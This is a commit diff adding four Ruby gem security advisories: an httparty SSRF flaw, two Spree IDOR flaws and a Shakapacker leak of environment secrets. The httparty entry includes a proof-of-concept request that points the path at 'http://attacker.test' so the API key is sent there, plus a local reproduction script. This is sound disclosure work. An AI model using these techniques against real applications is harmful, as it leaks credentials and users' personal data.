Updated advisory posts against rubysec/ruby-advisory-db@81853a7

Author: jasnow

advisories/_posts/2025-12-23-CVE-2025-68696.md

@@ -0,0 +1,117 @@
+---
+layout: advisory
+title: 'CVE-2025-68696 (httparty): httparty Has Potential SSRF Vulnerability That
+  Leads to API Key Leakage'
+comments: false
+categories:
+- httparty
+advisory:
+  gem: httparty
+  cve: 2025-68696
+  ghsa: hm5p-x4rq-38w4
+  url: https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
+  title: httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage
+  date: 2025-12-23
+  description: |
+    ## Summary
+
+    There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.
+
+    ## Details
+
+    When httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.
+
+    Consider the following example of a web application:
+
+    ```rb
+    require 'sinatra'
+    require 'httparty'
+
+    class RepositoryClient
+      include HTTParty
+      base_uri 'http://exmaple.test/api/v1/repositories/'
+      headers 'X-API-KEY' => '1234567890'
+    end
+
+    post '/issue' do
+      request_body = JSON.parse(request.body.read)
+      RepositoryClient.get(request_body['repository_id']).body
+      # do something
+      json message: 'OK'
+    end
+    ```
+
+    Now, suppose an attacker sends a request like this:
+
+    ```
+    POST /issue HTTP/1.1
+    Host: localhost:10000
+    Content-Type: application/json
+
+    {
+        "repository_id": "http://attacker.test",
+        "title": "test"
+    }
+    ```
+
+    In this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.
+
+    A similar problem was reported and fixed in the HTTP client library axios in the past:
+    <https://github.com/axios/axios/issues/6463>
+
+    Also, Python's `urljoin` function has documented a warning about similar behavior:
+    <https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin>
+
+    ## PoC
+
+    Follow these steps to reproduce the issue:
+
+    1. Set up two simple HTTP servers.
+
+       ```bash
+       mkdir /tmp/server1 /tmp/server2
+       echo "this is server1" > /tmp/server1/index.html
+       echo "this is server2" > /tmp/server2/index.html
+       python -m http.server -d /tmp/server1 10001 &
+       python -m http.server -d /tmp/server2 10002 &
+       ```
+
+    2. Create a script (for example, `main.rb`):
+
+       ```rb
+       require 'httparty'
+
+       class Client
+         include HTTParty
+         base_uri 'http://localhost:10001'
+       end
+
+       data = Client.get('http://localhost:10002').body
+       puts data
+       ```
+
+    3. Run the script:
+
+       ```bash
+       $ ruby main.rb
+       this is server2
+       ```
+
+    Although `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.
+
+
+    ## Impact
+
+    - Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
+    - SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
+    - Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.
+  cvss_v4: 8.8
+  patched_versions:
+  - ">= 0.24.0"
+  related:
+    url:
+    - https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
+    - https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-68696
+    - https://github.com/advisories/GHSA-hm5p-x4rq-38w4
+---

advisories/_posts/2026-01-08-CVE-2026-22588.md

@@ -0,0 +1,69 @@
+---
+layout: advisory
+title: 'CVE-2026-22588 (spree_api): Spree API has Authenticated Insecure Direct Object
+  Reference (IDOR) via Order Modification'
+comments: false
+categories:
+- spree_api
+advisory:
+  gem: spree_api
+  cve: 2026-22588
+  ghsa: g268-72p7-9j6j
+  url: https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j
+  title: Spree API has Authenticated Insecure Direct Object Reference (IDOR) via Order
+    Modification
+  date: 2026-01-08
+  description: |
+    ### Summary
+
+    An Authenticated Insecure Direct Object Reference (IDOR)
+    vulnerability was identified that allows an authenticated user to
+    retrieve other users’ address information by modifying an existing order.
+    By editing an order they legitimately own and manipulating address
+    identifiers in the request, the backend server accepts and processes
+    references to addresses belonging to other users, subsequently
+    associating those addresses with the attacker’s order and returning
+    them in the response.
+
+    ### Details
+
+    Affected Component(s)
+
+    - Authenticated user order management
+    - Address association logic
+    - Order update endpoint(s)
+
+    Affected Endpoint(s):
+    - `/api/v2/storefront/checkout`
+
+    The application fails to enforce proper object-level authorization
+    when updating an existing order. While the user is authenticated and
+    authorized to modify their own order, the backend does not verify
+    that the supplied address identifiers belong to the same authenticated user.
+
+    **See reference below for POC.**
+
+    ### Impact
+
+    As a result, an attacker can:
+    - Replace the address identifier with one belonging to another user
+    - Cause the backend to associate and return another user’s address
+      within the attacker’s order"
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 3.7.0"
+  patched_versions:
+  - "~> 4.10.2"
+  - "~> 5.0.7"
+  - "~> 5.1.9"
+  - ">= 5.2.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-22588
+    - https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j
+    - https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72
+    - https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3
+    - https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8
+    - https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7
+    - https://github.com/advisories/GHSA-g268-72p7-9j6j
+---

advisories/_posts/2026-01-08-CVE-2026-22589.md

@@ -0,0 +1,82 @@
+---
+layout: advisory
+title: 'CVE-2026-22589 (spree_core): Spree API has Unauthenticated IDOR - Guest Address'
+comments: false
+categories:
+- spree_core
+advisory:
+  gem: spree_core
+  cve: 2026-22589
+  ghsa: 3ghg-3787-w2xr
+  url: https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
+  title: Spree API has Unauthenticated IDOR - Guest Address
+  date: 2026-01-08
+  description: |
+    ### Summary
+
+    An Unauthenticated Insecure Direct Object Reference (IDOR)
+    vulnerability was identified that allows an unauthenticated attacker
+    to access guest address information without supplying valid
+    credentials or session cookies.
+
+    ###  Details
+
+    During testing, it was observed that all guest users can make an
+    unauthenticated request to retrieve address data belonging to other
+    guest users by manipulating object identifiers. The attacker would
+    need to know the storefront URL structure to perform this attack
+    (which can be learnt after creating a registered user account).
+
+    Affected Component(s)
+
+    * Address Edit endpoint: `/addresses/{addressId}/edit`
+
+    Root Cause
+    - Faulty authorization check in CanCanCan Ability class:
+
+    ```diff
+    - can :manage,  ::Spree::Address, user_id: user.id
+    + can :manage, ::Spree::Address, user_id: user.id if user.persisted?
+    ```
+
+    the `user` object in `Spree::Ability` class for guest users is
+    a `Spree.user_class.new` object.
+
+    Addresses endpoint to access it is part of the `spree_storefront`
+    gem. **Headless builds using APIs are not affected,** as the
+    Addresses endpoint there is only for registered users, and
+    records are scoped to the currently signed-in user.
+
+    ### Impact
+
+    An unauthenticated attacker can:
+
+    - Enumerate and retrieve guest address information (Addresses
+      associated with User accounts are NOT affected)
+    - Access personally identifiable information (PII) such as:
+    - Full names
+    - Physical addresses
+    - Phone numbers (if present)
+
+    This vulnerability could lead to:
+
+    - Privacy violations
+    - Regulatory compliance issues (e.g., GDPR)
+    - Loss of user trust"
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 4.10.2"
+  - "~> 5.0.7"
+  - "~> 5.1.9"
+  - ">= 5.2.5"
+  related:
+    url:
+    - https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
+    - https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795
+    - https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad
+    - https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67
+    - https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad
+    - https://github.com/advisories/GHSA-3ghg-3787-w2xr
+---

advisories/_posts/2026-01-08-GHSA-96qw-h329-v5rg.md

@@ -0,0 +1,99 @@
+---
+layout: advisory
+title: 'GHSA-96qw-h329-v5rg (shakapacker): Shakapacker has environment variable leak
+  via EnvironmentPlugin that exposes secrets to client-side bundles'
+comments: false
+categories:
+- shakapacker
+advisory:
+  gem: shakapacker
+  ghsa: 96qw-h329-v5rg
+  url: https://github.com/shakacode/shakapacker/security/advisories/GHSA-96qw-h329-v5rg
+  title: Shakapacker has environment variable leak via EnvironmentPlugin that exposes
+    secrets to client-side bundles
+  date: 2026-01-08
+  description: |
+    ### Summary
+
+    Since 2017, the default webpack plugins have passed the entire
+    `process.env` to `EnvironmentPlugin`. This pattern exposed ALL
+    build environment variables to client-side JavaScript bundles
+    whenever application code (or any dependency) referenced
+    `process.env.VARIABLE_NAME`.
+
+    This is not a regression - the vulnerable code has existed since
+    the original Webpacker implementation. No recent code change
+    in Shakapacker triggered this issue.
+
+    ### Impact
+
+    Any environment variable in the build environment that is referenced
+    in client-side code (including third-party dependencies) is embedded
+    directly into the JavaScript bundle. This includes:
+
+    - `DATABASE_URL` - Database credentials
+    - `AWS_SECRET_ACCESS_KEY` - AWS credentials
+    - `RAILS_MASTER_KEY` - Rails encrypted credentials key
+    - `STRIPE_SECRET_KEY`, `TWILIO_AUTH_TOKEN` - Third-party API keys
+    - Any other secrets present in the build environment
+
+    **Severity**: Critical - secrets are exposed in publicly accessible
+    JavaScript files.
+
+    ### Root Cause
+
+    The original code used:
+    ```javascript
+    new
+    webpack.EnvironmentPlugin(process.env)
+    ```
+
+    This makes every environment variable available for substitution. If
+    any code references `process.env.SECRET_KEY`, that value is embedded
+    in the bundle.
+
+    ### Patches
+
+    Upgrade to version 9.5.0 or later, which uses an allowlist approach
+    that only exposes `NODE_ENV`, `RAILS_ENV`, and `WEBPACK_SERVE` by default.
+
+    ### Workarounds
+
+    If developers cannot upgrade immediately:
+      1. Audit client-side code and dependencies for any `process.env.X`
+         references to sensitive variables
+      2. Remove sensitive variables from the build environment
+      3. Override the default plugins with a custom webpack/rspack
+         config using an explicit allowlist
+
+    ### Migration
+
+    After upgrading, if client-side code needs access to specific environment
+    variables:
+
+    **Option 1: Use the `SHAKAPACKER_PUBLIC_` prefix (recommended)**
+    ```bash
+    # Variables with this prefix are automatically exposed
+    export SHAKAPACKER_PUBLIC_API_URL=\"https://api.example.com\"
+    ```
+
+    **Option 2: Use `SHAKAPACKER_ENV_VARS`**
+    ```bash
+    SHAKAPACKER_ENV_VARS=API_URL,FEATURE_FLAG
+    bundle exec rails assets:precompile
+    ```
+
+    ### Action Required
+
+    After upgrading, **rotate any secrets** that may have been exposed
+    in previously compiled JavaScript bundles.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 9.5.0"
+  related:
+    url:
+    - https://github.com/shakacode/shakapacker/security/advisories/GHSA-96qw-h329-v5rg
+    - https://github.com/shakacode/shakapacker/pull/857
+    - https://github.com/shakacode/shakapacker/commit/3e06781b18383c5c2857ed3a722f7b91bdc1bc0e
+    - https://github.com/advisories/GHSA-96qw-h329-v5rg
+---